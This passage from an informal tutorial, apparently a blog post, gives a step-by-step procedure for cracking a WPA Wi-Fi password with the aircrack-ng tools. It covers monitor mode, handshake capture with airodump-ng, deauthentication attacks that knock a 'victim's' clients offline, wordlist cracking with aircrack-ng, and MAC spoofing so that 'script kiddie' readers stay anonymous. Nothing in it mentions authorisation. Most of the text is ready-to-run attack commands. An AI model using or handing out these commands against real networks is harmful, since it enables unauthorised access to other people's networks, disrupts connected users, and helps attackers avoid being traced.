airmon-ng start interface CHANNEL
Start dumping to the file

airodump-ng -c CHANNEL --bssid BSSID -w psk spoofedinterface
This will start airodump-ng on your specific channel (-c). It will search for handshakes of the specified BSSID and write this all to a capture file named psk (-w).
Notice! You might ask yourself: but how do I know when I've captured a handshake? Well, aircrack thought of that; if you managed to capture a handshake, a message appears in the upper right corner.
Optional, but very helpful for speeding up the process
So you need to capture a handshake, but the people who are connected of course won't be giving out the handshake, since this event only takes place during authentication. If we could just boot them for a small second off their network, so they could reconnect, that would be perfect!
aireplay-ng -0 10 -a BSSID -c CLIENTBSSID spoofedinterface
This would do 10 "deauthentication" attacks (-0) with the AP being BSSID and client being booted CLIENTBSSID. You can check if a client is connected by looking at your Airodump-ng screen again. If you see on the bottom of that screen that someone is connected to the ESSID of your victim, simply use the STATION BSSID as CLIENTBSSID in this example.
aircrack-ng -w /pentest/wordlist.lst -b BSSID psk*.cap
This would crack the actual capture file that was created by airodump-ng. Notice! You can only try to crack when a handshake actually took place. Don't forget, -w needs the path to your wordlist, so remember where you saved it!
Optional security
As a script kiddie, you might want to remain a bit anonymous, so here's how you would change your MAC.. Try to implement it yourself ;-)
sudo ifconfig spoofedinterface down && sudo macchanger -r interface && sudo macchanger -r spoofedinterface && ifconfig spoofedinterface up
Wordlists
If you ever needed some good wordlists, I suggest checking here first: wordlists
Qkyrie
